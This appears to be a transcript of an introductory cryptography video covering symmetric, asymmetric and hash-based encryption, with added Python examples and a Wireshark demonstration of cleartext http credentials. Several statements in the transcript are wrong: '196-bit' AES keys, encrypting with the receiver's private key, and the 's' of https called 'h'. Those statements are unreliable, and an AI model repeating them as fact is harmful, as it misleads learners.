People can guess the original word by looking at the encrypted text the only ones who can are the people who know how to decrypt the coded word thereby reversing the process of encryption any data pre-encryption is called plain text or clear text to encrypt the message we use certain

Algorithms that serve a single purpose of scrambling the data to make them unreadable without the necessary tools these algorithms are called ciphers they are a set of detailed steps to be carried out one after the other to make sure the data becomes as unreadable as possible until it reaches the receiver

We take the plain text pass it to the cipher algorithm and get the encrypted data this encrypted text is called the ciphertext and this is the message that is transferred between the two parties the key that is being used to scramble the data is known as the encryption key

These steps that is the cipher and the encryption key are made known to the receiver who can then reverse the encryption on receiving the message unless any third party manages to find out both the algorithm and the secret key that is being used they cannot decrypt the messages since both of them

Are necessary to unlock the hidden content wonder what else we would lose if not for cryptography any website where you have an account can read your passwords important emails can be intercepted and their contents can be read without encryption during the transit more than 65 billion messages are sent on whatsapp every day

All of which are secured thanks to end to end encryption there is a huge market opening up for cryptocurrency which is possible due to blockchain technology that uses encryption algorithms and hashing functions to ensure that the data is secure if this is of particular interest to you you can watch our video on

Blockchain the link of which will be in the description of course there is no single solution to a problem as diverse as explained there are three variants of how cryptography works and is in practice they are symmetric encryption asymmetric encryption and hashing let’s find out how much we have understood until now

Do you remember the difference between a cipher and ciphertext leave your answers in the comments and before we proceed if you find this video interesting make sure to give it a thumbs up before moving ahead let’s look at symmetric encryption first symmetric encryption uses a single key for both the encryption and decryption

Of data it is comparatively less secure than asymmetric encryption but much faster it is a compromise that has to be embraced in order to deliver data as fast as possible without leaving information completely vulnerable this type of encryption is used when data rests on servers and identifies personnel for payment applications and

Services the potential drawback with symmetric encryption is that both the sender and receiver need to have the same secret key and it should be kept hidden at all times the caesar cipher and the enigma machine are both symmetric encryption examples that we will look into further for example

If alice wants to send a message to bob she can apply a substitution cipher or a shift cipher to encrypt the message but bob must be aware of the same key itself so he can decrypt it when he finds it necessary to read the entire message symmetric encryption uses one of

The two types of ciphers stream ciphers and block ciphers block ciphers break the plain text into blocks of fixed size and use the key to convert it into ciphertext stream ciphers convert the plaintext into ciphertext one bit at a time instead of resorting to breaking them up into bigger chunks
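The shift cipher Alice and Bob share above, as an added example that is not code from the video: encryption and decryption with the same secret shift, a keyword-based substitution alphabet, and a listing of all possible shifts that shows why so small a key space is only of historical interest. The keyword `simplilearn` and the helper names are my own choices.

```python
import string

ALPHABET = string.ascii_lowercase


def shift_encrypt(plaintext: str, key: int) -> str:
    """Caesar / shift cipher: move every letter `key` places along the alphabet.
    Letters wrap around (z + 1 = a), case is kept, other characters pass through."""
    out = []
    for ch in plaintext:
        if ch.isalpha():
            base = string.ascii_uppercase if ch.isupper() else ALPHABET
            out.append(base[(base.index(ch) + key) % 26])
        else:
            out.append(ch)
    return "".join(out)


def shift_decrypt(ciphertext: str, key: int) -> str:
    # The receiver reverses the shift with the very same secret key: that shared
    # key is what makes the scheme symmetric.
    return shift_encrypt(ciphertext, -key)


def keyword_alphabet(keyword: str) -> str:
    """Build a substitution key: the keyword's distinct letters first, then the
    rest of the alphabet in order. The result is a permutation of a-z."""
    seen = []
    for ch in keyword.lower() + ALPHABET:
        if ch in ALPHABET and ch not in seen:
            seen.append(ch)
    return "".join(seen)


def substitution_encrypt(plaintext: str, key_alphabet: str) -> str:
    # General substitution cipher: plaintext letter number i becomes key_alphabet[i].
    table = str.maketrans(ALPHABET, key_alphabet)
    return plaintext.lower().translate(table)


def substitution_decrypt(ciphertext: str, key_alphabet: str) -> str:
    # Same key alphabet, mapping applied in the opposite direction.
    table = str.maketrans(key_alphabet, ALPHABET)
    return ciphertext.translate(table)


def brute_force_shift(ciphertext: str) -> list:
    """Why the shift cipher is weak by modern standards: only 25 keys exist, so
    every candidate plaintext can simply be listed. Index k holds the text
    obtained by undoing a shift of k."""
    return [shift_decrypt(ciphertext, k) for k in range(26)]


if __name__ == "__main__":
    ct = shift_encrypt("attack", 3)
    print("shift +3:", ct, "->", shift_decrypt(ct, 3))
    key = keyword_alphabet("simplilearn")
    print("substitution key:", key)
    print("substitution:", substitution_encrypt("attack", key))
    for k, candidate in enumerate(brute_force_shift(ct)):
        print(k, candidate)
```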

In today’s world the most widely used symmetric encryption algorithm is aes 256 that stands for advanced encryption standard which has a key size of 256 bit with 128 bit and 196 bit key sizes also being available other primitive algorithms like the data encryption standard that is the des the triple data

Encryption standard 3des and blowfish have all fallen out of favor due to the rise of aes aes chops up the data into blocks and performs 10 plus rounds of obscuring and substituting the message to make it unreadable asymmetric encryption on the other hand has a double whammy at its disposal

There are two different keys at play here a public key and a private key the public key is used to encrypt information pre-transit and a private key is used to decrypt the information post transit if alice wants to communicate with bob using asymmetric encryption she encrypts the message using bob’s public key

After receiving the message bob uses his own private key to decrypt the data this way nobody can intercept the message in between transmissions and there is no need for any secure key exchange for this to work since the encryption is done with the public key and the decryption is done with a

Private key that no one except bob has access to both the keys are necessary to read the full message there is also a reverse scenario where we can use the private key for encryption and the public key for decryption a server can sign non-confidential information using its private key and

Anyone who has its public key can decrypt the message this mechanism also proves that the sender is authenticated and there is no problem with the origin of the information rsa encryption is the most widely used asymmetric encryption standard it is named after its founders Rivest, Shamir and Adleman and it uses block ciphers

That separate the data into blocks and obscure the information widely considered the most secure form of encryption albeit relatively slower than aes it is widely used in web browsing secure identification vpns emails and chat applications with so much hanging on the key secrecy there must be a way to transmit the keys

Without others reading our private data many systems use a combination of symmetric encryption and asymmetric encryption to bolster security and match speed at the same time since asymmetric encryption takes longer to decrypt large amounts of data the full information is encrypted using a single key that is symmetric encryption

That single key is then transmitted to the receiver using asymmetric encryption so you don’t have to compromise either way another route is using the diffie-hellman key exchange which relies on a one-way function and is much tougher to break into the third variant of cryptography is termed as hashing

Hashing is the process of scrambling a piece of data beyond recognition it gives an output of fixed size which is known as the hash value of the original data or just hash in general the calculations that do the job of messing up the data collection form the hash function

They are generally not reversible without resilient brute force mechanisms and are very helpful when storing data on website servers that need not be stored in plain text for example many websites store your account passwords in a hashed format so that not even the administrator can read your credentials
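Password storage as the passage describes it, as an added example that is not part of the video: the server keeps only a salted, deliberately slow hash, and a login recomputes that hash from the entered password and compares it with the stored one. `ITERATIONS` is an illustrative work factor of my choosing, and PBKDF2 from the standard library stands in for whatever password hash a real site uses.

```python
import hashlib
import hmac
import os
from typing import Optional

# Work factor for PBKDF2-HMAC-SHA256 (illustrative value; production systems
# tune it to their hardware and raise it over time).
ITERATIONS = 100_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Turn a password into the record a server stores instead of the password.
    A fresh random salt makes equal passwords produce different records, and the
    iteration count slows down offline guessing against a stolen hash table."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Login check: recompute the hash of the entered password with the stored
    salt and iteration count, then compare it against the stored hash. The
    password itself is never stored and never needs to be."""
    algorithm, iterations, salt_hex, hash_hex = record.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    # Constant-time comparison so response timing does not reveal how many
    # bytes of the hash already matched.
    return hmac.compare_digest(candidate, bytes.fromhex(hash_hex))


def unsalted_sha256(password: str) -> str:
    """What not to do: a bare, unsalted, fast hash. Two users with the same
    password get the same value, and precomputed tables apply directly."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    stored = hash_password("correct horse")
    print("stored record:", stored)
    print("right password accepted:", verify_password("correct horse", stored))
    print("wrong password accepted:", verify_password("wrong horse", stored))
    print("same password, second user, same record:", hash_password("correct horse") == stored)
```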

When a user tries to log in they can compare the entered passwords hash value with the hash value that is already stored on the servers for authentication since the function will always return the same value for the same input cryptography has been in practice for centuries julius caesar used a substitution shift

To move letters a certain number of spaces beyond their place in the alphabet table a spy can’t decipher the original message at first glance for example if he wanted to pass confidential information to his armies and decides to use the substitution shift of plus 2 a

Becomes c b becomes d and so on the word attack when passed through a substitution shift of plus three becomes d w w d f n this cipher has been appropriately named the caesar cipher which is one of the most widely used algorithms the enigma is probably the most famous

Cryptographic cipher device used in ancient history it was used by the nazi german armies in the world wars they were used to protect confidential political military and administrative information and it consisted of three or more rotors that scrambled the original message depending on the machine state at that

Time the decryption is similar but it needs both machines to stay in the same state before passing the ciphertext so that we receive the same plain text message let’s take a look at how our data is protected while we browse the internet thanks to cryptography here we have a

Web-based tool that will help us understand the process of rsa encryption we see the entire workflow from selecting the key size to be used until the decryption of the cipher text in order to get the plain text back as we already know rsa encryption algorithm falls under the umbrella of asymmetric key cryptography

That basically implies that we have two keys at play here a public key and a private key typically the public key is used by the sender to encrypt the message and the private key is used by the receiver to decrypt the message there are some occasions when this

Allocation is reversed and we will have a look at them as well in rsa we have the choice of key size we can select any key from a 512 bit to 1024 bit all the way up to a 4096 bit key the longer the key length the more complex the encryption process becomes

And thereby strengthening the cipher text although with added security more complex functions take longer to perform the same operations on similar size of data we have to keep a balance between both speed and strength because the strongest encryption algorithms are of no use if they cannot be practically

Deployed in systems around the world let’s take a 1024 bit key over here now we need to generate the keys this generation is done by functions that operate on pass phrases the tool we are using right now generates these pseudorandom keys to be used in this explanation

Once we generate the keys you can see the public key is rather smaller than the private key which is almost always the case these two keys are mathematically linked with each other they cannot be substituted with any other key and in order to encrypt the original message or decrypt the cipher

Text this pair must be kept together the public key is then sent to the sender and the receiver keeps the private key with himself in this scenario let’s try and encrypt a word Simplilearn we have to select if the key being used for encryption is either private or

Public since that affects the process of scrambling the information since we are using the public key over here let’s select the same and copy it and paste over here the cipher we are using right now is plain rsa there are some modified ciphers with their own pros and cons

That can also be used provided we use it on a regular basis and depending on the use case as well once we click on encrypt we can see the ciphertext being generated over here the pseudorandom generating functions are created in such a way that a single character change in the plaintext will

Trigger a completely different ciphertext this is a security feature to strengthen the process from brute force methods now that we are done with the encryption process let’s take a look at the decryption part the receiver gets this cipher text from the sender with no other key or supplement

He or she must already possess the private key generated from the same pair no other private key can be used to decrypt the message since they are mathematically linked we paste the private key here and select the same the cipher must always be the same used during the encryption process

Once we click decrypt you can see the original plain text we had decided to encrypt this sums up the entire process of rsa encryption and decryption now some people use it the other way around we also have the option of using the private key to encrypt information

And the public key to decrypt it this is done mostly to validate the origin of the message since the keys only work in pairs if a different private key is used to encrypt the message the public key cannot decrypt it conversely if the public key is able to decrypt the

Message it must have been encrypted with the right private key and hence the rightful owner here we just have to take the private key and use that to encrypt the plain text and select the same in this check box as well you can see we have generated a completely new cipher text

This cipher text will be sent to the receiver and this time we will use the public key for decryption let’s select the correct checkbox and decrypt and we still get the same output now let’s take a look at a practical example of encryption in the real world
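The walkthrough above in working form, as an added example that is not the web tool from the video: a toy RSA key pair from two fixed small primes, public-key encryption with private-key decryption, the reversed allocation (sign with the private key, check with the public key), and what happens when the wrong private key is used. The primes, the marker-byte padding and every function name are constructed for illustration and are nowhere near real key sizes.

```python
import hashlib
import math
from typing import List, Tuple

# Constructed toy parameters: two known primes, far too small for real use.
# Real keys (the 1024- to 4096-bit sizes in the walkthrough) use primes found
# by randomized primality tests, and real messages are padded (OAEP for
# encryption, PSS for signatures) rather than with the marker byte used here.
P, Q = 1_000_000_007, 998_244_353
CHUNK = 6  # plaintext bytes per block: 1 marker byte + 6 bytes < 2**56 < n

Key = Tuple[int, int]  # (exponent, modulus)


def generate_keypair(p: int = P, q: int = Q) -> Tuple[Key, Key]:
    """Return (public_key, private_key). The two are mathematically linked:
    e*d = 1 (mod phi(n)), so only this d undoes what this e did."""
    n = p * q
    phi = (p - 1) * (q - 1)
    e = 65537
    while math.gcd(e, phi) != 1:  # e must be invertible modulo phi(n)
        e += 2
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return (e, n), (d, n)


def _to_blocks(data: bytes) -> List[int]:
    # Block-cipher style: split the message into fixed-size chunks and turn
    # each into an integer smaller than n. The 0x01 marker keeps leading zero
    # bytes of a chunk from vanishing in the integer round trip.
    return [int.from_bytes(b"\x01" + data[i:i + CHUNK], "big")
            for i in range(0, len(data), CHUNK)]


def _from_blocks(blocks: List[int]) -> bytes:
    out = bytearray()
    for m in blocks:
        raw = m.to_bytes(max(1, (m.bit_length() + 7) // 8), "big")
        out += raw.lstrip(b"\x00")[1:]  # drop the marker byte
    return bytes(out)


def rsa_encrypt(message: bytes, public_key: Key) -> List[int]:
    """Sender side: c = m^e mod n per block, using the receiver's public key."""
    e, n = public_key
    return [pow(m, e, n) for m in _to_blocks(message)]


def rsa_decrypt(ciphertext: List[int], private_key: Key) -> bytes:
    """Receiver side: m = c^d mod n. Any other private key yields garbage."""
    d, n = private_key
    return _from_blocks([pow(c, d, n) for c in ciphertext])


def _digest_mod_n(message: bytes, n: int) -> int:
    # Sign a hash of the message, not the message itself; reduced mod n only
    # because this toy modulus is smaller than a SHA-256 digest.
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def rsa_sign(message: bytes, private_key: Key) -> int:
    """The reversed allocation: the private-key operation proves origin."""
    d, n = private_key
    return pow(_digest_mod_n(message, n), d, n)


def rsa_verify(message: bytes, signature: int, public_key: Key) -> bool:
    """Anyone holding the public key can undo the private-key operation; the
    check only passes if the matching private key produced the signature and
    the message is unchanged."""
    e, n = public_key
    return pow(signature, e, n) == _digest_mod_n(message, n)


if __name__ == "__main__":
    public, private = generate_keypair()
    ct = rsa_encrypt(b"Simplilearn", public)
    print("ciphertext blocks:", ct)
    print("decrypted:", rsa_decrypt(ct, private))
    sig = rsa_sign(b"call me today", private)
    print("signature valid:", rsa_verify(b"call me today", sig, public))
    print("tampered message valid:", rsa_verify(b"call me tomorrow", sig, public))
```

The same `rsa_encrypt` call is what wraps a symmetric key in the hybrid scheme the video mentions: the bulk data goes through the fast symmetric cipher, and only that short key is RSA-encrypted to the receiver's public key.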

We all use the internet on a daily basis and many are aware of the implications of using unsafe websites let’s take a look at wikipedia here pretty standard https website where the h stands for secured let’s take a look at how it secures that data wireshark is the world’s foremost and

Most widely used network protocol analyzer it lets you see what’s happening on your network at a microscopic level and we are going to use the software to see the traffic that is leaving a machine and to understand how vulnerable it is since there are many applications running in this machine let’s apply a

Filter that will only show us the results related to wikipedia let’s search for something that we can navigate the website with okay once we get into it a little you can see some of the requests being populated over here let’s take a look at the specific request these are the data packets that basically transport the data from our

Machine to the internet and vice versa as you can see there’s a bunch of gibberish data here that doesn’t really reveal anything that we searched or watched similarly other secured websites function the same way and it is very difficult if at all possible to snoop on user data this way

To put this in perspective let’s take a look at another website which is a http web page this has no encryption enabled from the server end which makes it vulnerable to attacks there is a login form here which needs legitimate user credentials in order to grant access

Let’s enter a random pair of credentials these obviously won’t work but we can see the manner of data transfer unsurprisingly we weren’t able to get into the platform instead we can see the data packets let’s apply a similar filter that will help us understand what request this website is sending

These are the requests being sent by the http login form to the internet if we check here we see whatever username and password that we are entering we can easily see it with wireshark now we used a dummy pair of credentials if we select the right data packet we

Can find our correct credentials if any website had asked for a payment information or a legitimate credentials it would have been really easy to get a hold of these to reiterate what we have already learned we must always avoid http websites and just unknown or not trustworthy websites in general because

The problem we saw here is just the tip of the iceberg even though cryptography has managed to lessen the risk of cyber attacks it is still prevalent and we should always be alert to keep ourselves safe online there are two types of encryption in cryptography symmetric cryptography and asymmetric key cryptography
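The http versus https contrast from the capture above, as an added example that is not from the video: a small auditing routine over constructed packet payloads that flags login credentials crossing the wire in cleartext and treats TLS records as opaque, the way the wikipedia traffic looked in wireshark. The host, path and field names in the samples are constructed, and the audit reports field names only, never values.

```python
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Constructed sample payloads standing in for two captured packets: a login
# form submitted over plain http, and a TLS application-data record as an
# https site would send (content type 0x17, version 0x0303, opaque bytes).
HTTP_LOGIN_POST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 33\r\n"
    b"\r\n"
    b"username=dummyuser&password=dummy"
)
TLS_APP_DATA = b"\x17\x03\x03\x00\x20" + bytes(range(0x80, 0xA0))

# Form field names that should never travel unencrypted.
SENSITIVE_FIELDS = {"password", "passwd", "pwd", "pin", "cvv", "cardnumber"}


def is_tls_record(payload: bytes) -> bool:
    # TLS record header: content type 0x14-0x17, then version major byte 3.
    return len(payload) >= 5 and payload[0] in (0x14, 0x15, 0x16, 0x17) and payload[1] == 3


def parse_http_request(payload: bytes) -> Optional[Dict]:
    """Parse a cleartext HTTP request; returns None if the bytes are not one.
    An encrypted record never parses, which is the whole point of https."""
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii", "replace")] = (
            value.strip().decode("ascii", "replace"))
    fields: Dict[str, str] = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        fields = {k: v[0] for k, v in parse_qs(body.decode("utf-8", "replace")).items()}
    return {"method": parts[0].decode("ascii", "replace"),
            "path": parts[1].decode("ascii", "replace"),
            "host": headers.get("host", ""), "fields": fields}


def audit_packets(packets: List[bytes]) -> List[Dict]:
    """Defender's view of the capture: where did credentials cross the wire
    unprotected? Field names are reported; values deliberately are not."""
    findings = []
    for payload in packets:
        if is_tls_record(payload):
            findings.append({"status": "encrypted", "host": "", "path": "", "fields": []})
            continue
        req = parse_http_request(payload)
        if req is None:
            findings.append({"status": "unknown", "host": "", "path": "", "fields": []})
            continue
        names = sorted(req["fields"])
        exposed = any(n.lower() in SENSITIVE_FIELDS for n in names)
        findings.append({"status": "cleartext-credentials" if exposed else "cleartext",
                         "host": req["host"], "path": req["path"], "fields": names})
    return findings


if __name__ == "__main__":
    for finding in audit_packets([HTTP_LOGIN_POST, TLS_APP_DATA]):
        print(finding)
```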

Both of these categories have their pros and cons and differ only by the implementation today we are going to focus exclusively on symmetric key cryptography let us have a look at its applications in order to understand its importance better this variant of cryptography is primarily used in banking applications where personally identifiable

Information needs to be encrypted with so many aspects of banking moving on to the internet having a reliable safety net is crucial symmetric cryptography helps in detecting bank fraud and boosts the security index of these payment gateways in general they are also helpful in protecting data

That is not in transit and rests on servers and data centers these centers house a massive amount of data that needs to be encrypted with a fast and efficient algorithm so that when the data needs to be recalled by the respective service there is the assurance of minor to no delay

While browsing the internet we need symmetric encryption to browse secure https websites so that we get an all around protection it plays a significant role in verifying website server authenticity exchanging the necessary encryption keys required and generating a session using those keys to ensure maximum security this helps us in preventing the rather

Insecure http website format so let us understand how symmetric key cryptography works first before moving on to the specific algorithms symmetric key cryptography relies on a single key for the encryption and decryption of information both the sender and receiver of the message need to have a pre-shared secret

Key that they will use to convert the plain text into ciphertext and vice versa as you can see in the image the key used for encryption is the same key needed for decrypting the message at the other end the secret key shouldn’t be sent along with the cipher text to the

Receiver because that would defeat the entire purpose of using cryptography key exchange can be done beforehand using other algorithms like the diffie-hellman key exchange protocol for example if paul wants to send a simple message to jane they need to have a single encryption key that both of

Them must keep secret to prevent snooping by malicious actors it can be generated by either one of them but must belong to both of them before the messages start flowing suppose the message i am ready is converted into ciphertext using a specific substitution cipher by paul in

That case jane must also be aware of the substitution shift to decrypt the ciphertext once it reaches her irrespective of the scenario where someone manages to grab the ciphertext mid-transit to try and read the message not having the secret key renders everyone looking to snoop in helpless the symmetric key algorithms like the

Data encryption standard have been in use since the 1970s while the popular ones like aes have become the industry standard today with the entire architecture of symmetric cryptography depending on the single key being used you can understand why it’s of paramount importance to keep it secret on all occasions

The side effect of having a single key for the encryption and decryption is it becomes a single point of failure anyone who gets their hand on it can read all the encrypted messages and do so mainly without the knowledge of the sender and the receiver so it is the priority to keep the

Encryption and decryption key private at all times should it fall into the wrong hands the third party can send messages to either the sender or the receiver using the same key to encrypt the message upon receiving the message and decrypting it with the key it is impossible to guess its origin

If the sender somehow transmits the secret key along with the cipher text anyone can intercept the package and access the information consequently this encryption category is termed private key cryptography since a big part of the data’s integrity is riding on the promise that the users can keep the key secret this terminology

Contrasts with asymmetric key cryptography which is called public key cryptography because it has two different keys at play one of which is public provided we managed to keep the key secret we still have to choose what kind of ciphers we want to use to encrypt this information in symmetric key cryptography there are

Broadly two categories of ciphers that we can employ let us have a look stream ciphers are the algorithms that encode basic information one bit at a time it can change depending on the algorithm being used but usually it relies on a single bit or byte to do the encryption

This is the relatively quicker alternative considering the algorithm doesn’t have to deal with blocks of data at a single time every piece of data that goes into the encryption can and needs to be converted into binary format in stream ciphers each binary digit is encrypted one after the other

The most popular ones are the rc4 salsa and panama the binary data is passed through an encryption key which is a randomly generated bit stream upon passing it through we receive the ciphertext that can be transferred to the receiver without fear of man in the middle attacks
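A working stream cipher in the shape the passage describes, as an added example that is not from the video: a keyed pseudorandom bit stream XORed byte by byte into the plaintext, plus the one failure a practitioner must design against, reuse of the same keystream for two messages. The keystream uses HMAC-SHA256 in a counter construction of my own choosing rather than RC4, Salsa or Panama.

```python
import hashlib
import hmac
import secrets


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """The 'randomly generated bit stream' of the passage: a keyed pseudorandom
    function (HMAC-SHA256) applied to (nonce, counter) blocks until enough
    bytes exist. Illustrative construction, not a standardized cipher."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        block = nonce + counter.to_bytes(8, "big")
        out += hmac.new(key, block, hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def stream_encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Stream cipher core: each plaintext byte XORed with one keystream byte."""
    stream = keystream(key, nonce, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, stream))


def stream_decrypt(key: bytes, nonce: bytes, ciphertext: bytes) -> bytes:
    # XOR undoes itself, so decryption is the same operation with the same key
    # and nonce; the receiver must hold both.
    return stream_encrypt(key, nonce, ciphertext)


def new_nonce() -> bytes:
    # A fresh nonce per message makes every keystream unique under one key.
    return secrets.token_bytes(16)


def keystream_reuse_leak(ct1: bytes, ct2: bytes) -> bytes:
    """Failure mode to design against: if two messages are encrypted under the
    same key AND nonce, XORing the two ciphertexts cancels the keystream and
    leaves p1 XOR p2, so the cipher no longer hides how the messages relate.
    Returns ct1 XOR ct2 over the common length."""
    return bytes(a ^ b for a, b in zip(ct1, ct2))


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    nonce = new_nonce()
    ct = stream_encrypt(key, nonce, b"i am ready")
    print("ciphertext (hex):", ct.hex())  # the hexadecimal form the passage mentions
    print("decrypted:", stream_decrypt(key, nonce, ct))
```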

The binary data can be passed through an algorithmic function it can have either xor operations as it is most of the time or any other mathematical calculations that have the singular purpose of scrambling the data the encryption key is generated using the random bitstream generator and it

Acts as a supplement in the algorithmic function the output is in binary form which is then converted into the decimal or hexadecimal format to give our final ciphertext on the other hand block ciphers dissect the raw information into chunks of data of fixed size the size of these blocks depends on the

Exact cipher being used a 128-bit block cipher will break the plain text into blocks of 128 bit each and encrypt those blocks instead of a single digit once these blocks are encrypted individually they are chained together to form a final cipher text block ciphers are much slower but they

Are more tamper-proof and are used in some of the most widely used algorithms employed today just like stream ciphers the original ciphertext is converted into binary format before beginning the process once the conversion is complete the blocks are passed through the encryption algorithm along with the encryption key this would provide us

With the encrypted blocks of binary data once these blocks are combined we get a final binary string this string is then converted into hexadecimal format to get a ciphertext today the most popular symmetric key algorithms like aes des and 3des are all block cipher methodology subsets with so many factors coming into play

There are quite a few things symmetric key cryptography excels at while falling short in some others symmetric key cryptography is a much faster variant when compared to asymmetric key cryptography there is only one key in play unlike asymmetric encryption and this drastically improves calculation speed in the encryption and decryption similarly the performance of symmetric

Encryption is much more efficient under similar computational limitations fewer calculations help in better memory management for the whole system bulk amounts of data that need to be encrypted are very well suited for symmetric algorithms since they are much quicker handling large amounts of data is simple and easy to use in servers and

Data farms this helps in better latency during data recall and fewer mixed packets thanks to its simple single key structure symmetric key cryptography algorithms are much easier to set up a communication channel with and offer much more straightforward maintenance duties once the secret key is transmitted to both the sender and

Receiver without any prior mishandling the rest of the system aligns easily and everyday communications become easy and secure if the algorithm is applied as per the documentation symmetric algorithms are very robust and can encrypt vast amounts of data with very little overhead in our last video on

Cryptography we took a look at symmetric key cryptography we used a single private key for both the encryption and decryption of data and it works very well in theory let’s take a look at a more realistic scenario now let’s meet joe joe is a journalist who needs to

Communicate with ryan via long distance messaging due to the critical nature of the information people are waiting for any message to leave joe’s house so that they can intercept it now joe can easily use symmetric key cryptography to send the encrypted data so that even if someone intercepts the

Message they cannot understand what it says but here’s the tricky part how will joe send the required decryption key to ryan the sender of the message as well as the receiver need to have the same decryption key so that they can exchange messages otherwise ryan cannot decrypt the information even when he receives

The cipher text if someone intercepts the key while transmitting it there is no use in employing cryptography since a third party can now decode all the information easily key sharing is a risk that will always exist when symmetric key cryptography is being used thankfully asymmetric key encryption has managed to fix this problem

Let’s understand what asymmetric key cryptography is asymmetric encryption uses a double layer of protection there are two different keys at play here a private key and a public key a public key is used to encrypt the information pre-transit and a private key is used to decrypt the data post transit

This pair of keys must belong to the receiver of the message the public keys can be shared via messaging blog posts or key servers and there are no restrictions as you can see in the image the two keys are working in the system the sender first encrypts the message

Using the receiver’s private key after which we receive the cipher text the cipher text is then transmitted to the receiver without any other key on getting the ciphertext the receiver uses his private key to decrypt it and get the plain text back there has been no requirement of any key exchange

Throughout this process therefore solving the most glaring flaw faced in symmetric key cryptography the public key known to everyone cannot be used to decrypt the message and the private key which can decrypt the message need not be shared with anyone the sender and receiver can exchange

Personal data using the same set of keys as often as possible to understand this better take the analogy of your mailbox anyone who wants to send you a letter has access to the box and can easily share information with you in a way you can say the mailbox is

Publicly available to all but only you have access to the key that can open the mailbox and read the letters in it this is how the private key comes to play no one can intercept the message and read its contents since it’s encrypted once the receiver gets its contents he

Can use his private key to decrypt the information both the public key and the private key are generated so they are interlinked and you cannot substitute other private keys to decrypt the data in another example if alice wants to send a message to bob let’s say it reads call me today she

Must use bob’s public key while encrypting the message upon receiving the cipher message bob can proceed to use his private key in order to decrypt the message and hence complete security is attained during transmission without any need for sharing the key since this type of encryption is highly

Secure it has many uses in areas that require high confidentiality it is used to manage digital signatures so there is valid proof of a document’s authenticity with so many aspects of business transitioning to the digital sphere critical documents need to be verified before being considered authentic and acted upon thanks to asymmetric cryptography

Senders can now sign documents with their private keys anyone who needs to verify the authenticity of such signatures can use the sender’s public key to decrypt the signature since the public and the private keys are linked to each other mathematically it’s impossible to repeat this verification with duplicate keys

Document encryption has been made very simple by today’s standards but the background implementation follows the similar approach in blockchain architecture asymmetric key cryptography is used to authorize transactions and maintain the system thanks to its two key structure changes are reflected across the blockchain’s peer-to-peer network only if it is approved from both ends

Along with asymmetric key cryptography’s tamper-proof architecture its non-repudiation characteristic also helps in keeping the network stable we can also use asymmetric key cryptography combined with symmetrical cryptography to monitor ssl or tls encrypted browsing sessions to make sure nobody can steal our personal information when accessing banking websites or the internet in general

It plays a significant role in verifying website server authenticity exchanging the necessary encryption keys required and generating a session using those keys to ensure maximum security instead of the rather insecure http website format security parameters differ on a session by session basis so the verification process is consistent and

Utterly essential to modern data security another great use of the asymmetric key cryptography structure is transmitting keys for symmetric key cryptography with the most significant difficulty in symmetric encryption being key exchange asymmetric keys can help clear the shortcoming the original message is first encrypted using a symmetric key the key used for

Encrypting the data is then converted into ciphertext using the receiver’s public key now we have two ciphertexts to transmit to the receiver on receiving both of them the receiver uses his private key to decrypt the symmetric key he can then use it to decrypt the original

Information on getting the key used to encrypt the data while this may seem more complicated than just asymmetric cryptography alone symmetric encryption algorithms are much more optimized for vast amounts of data on some occasions encrypting the key using asymmetric algorithms will definitely be more memory efficient and secure

You might remember us discussing why symmetric encryption was called private key cryptography let us understand why asymmetric falls under the public key cryptography we have two keys at our disposal the encryption key is available to everyone the decryption key is supposed to be private unlike symmetric key cryptography there

Is no need to share anything privately to have an encrypted messaging system to put that into perspective we share an email address with anyone looking to communicate with us it is supposed to be public by design so that our email login credentials are private and they help in preventing any data mishandling

Since there is nothing hidden from the world if they want to send us any encrypted information this category is called the public key cryptography there are quite a few algorithms being used today that follow the architecture of asymmetric cryptography none more famous than the rsa encryption rsa encryption is the most widely used

Encryption or public key encryption standard using asymmetric approach named after its founders Rivest, Shamir and Adleman it uses block ciphers to obscure the information if you are unfamiliar with how block ciphers work they are encryption algorithms that divide the original data into blocks of equal size the block size depends on the exact

Cipher being used once they are broken down these blocks are encrypted individually and later chained together to form the final cipher text widely considered to be the most secure form of encryption albeit relatively slower than symmetric encryption algorithms it is widely used in web browsing secure identification vpns emails and other chat applications

With so many variables in play, there must be some advantages that give asymmetric cryptography an edge over the traditional symmetric encryption methodologies. Let's go through some of them.

There is no need for any reliable key sharing channel in asymmetric encryption. It was an added risk in private key cryptography that has been completely eliminated in public key architecture: the key which is made public cannot decrypt any confidential information, and the only key that can decrypt doesn't need to be shared publicly under any circumstance.

We have much more extensive key lengths in RSA encryption and other asymmetric algorithms, like 2048-bit keys and 4096-bit keys. Larger keys are much harder to break into via brute force and are much more secure.

Asymmetric key cryptography can be used as a proof of authenticity, since only the rightful owner of the keys can generate the messages to be decrypted by the private key. The situation can also be reversed: encryption is done using a private key and decryption is done by the public key, which would not function if the correct private key is not used to generate the message, hence proving the authenticity of the owner. It also has a tamper protection feature, where the message cannot be intercepted and changed without invalidating the private key used to encrypt the data. Consequently, the public key cannot decrypt the message, and it is easy to realize the information is not 100% legitimate, when and where the case requires.

